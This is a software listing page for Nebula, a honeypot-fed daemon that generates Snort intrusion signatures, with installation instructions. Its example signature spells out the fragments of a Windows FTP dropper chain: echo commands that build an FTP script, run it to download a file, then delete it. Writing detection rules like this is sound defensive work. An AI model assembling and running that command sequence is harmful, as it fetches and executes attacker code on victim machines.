Nebula Nebula is a fully automated intrusion signature generator.
Download

Nebula Ranking & Summary

Nebula Tags

signature generator intrusion network security intrusion signature signature generator

Nebula Description

Nebula is a fully automated intrusion signature generator. Nebula is a fully automated intrusion signature generator. It can help securing a network by automatically calculating filter rules from attack traces. In a common setup nebula runs as a daemon and receives attacks from honeypots. Signatures are currently published in snort format.The code was written to be fast. A signature isn't of much value if the generation process takes hours or days. With nebula, you should get a first revision within a few seconds. As more attacks of a kind are submitted, signatures get better and nebula will publish updated revisions.The signature below was generated by nebula for FTP downloads during multi-stage attacks.alert tcp any any -> $HOME_NET 8555 (msg: "nebula rule 2000001 rev. 1"; content: "cmd /"; offset: 0; depth: 5; content: " echo open "; distance: 1; within: 17; content: ">> ii &echo user 1 1 >> ii &echo get "; distance: 13; within: 70; content: ">> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &"; distance: 2; within: 107; sid: 2000001; rev: 1;)Nebula successfully generated signatures for input from honeytrap and argos. Feeding it with input from other sources shouldn't be very difficult, though. The code archive contains a command line client which submits data from files to a nebula server. Its code can also be taken as a reference implementation for the client side part of nebula's submission protocol.Compiling nebulaInstalling nebula is easy. Just follow the instructions on this page. First download the latest release from sourceforge:wget unpack the archive and change into the extracted directory:tar xjf nebula-0.2.2.tar.bz2 && cd nebula-0.2.2Run the configure script to create a setup for your platform. If you want to install nebula in a specific location, use the --prefix switch as in the example below:./configure --prefix=/opt/nebulaTo finally build and install nebula type:make && sudo make installThis installs the commands nebula and nebulaclient in /opt/nebula/bin/ (or the location you chose when invoking configure). Now check your setup by running nebula:$ /opt/nebula/bin/nebula Nebula 0.2.2 Copyright (C) 2007-2008 Tillmann Werner Warning - No submission secret given. Ready.If you see the output above, the installation was successful. To eliminate the warning, use the command line swith -s to define a secret used for submissions. Nebula can be stopped at any time by hitting Ctrl+C. What's New in This Release: · An entropy threshold bug was corrected. · Realtime signal thread control is enabled only if it is available. · BSD compatibility changes were made. · The default host and port in nebulaclient was fixed.

Nebula Related Software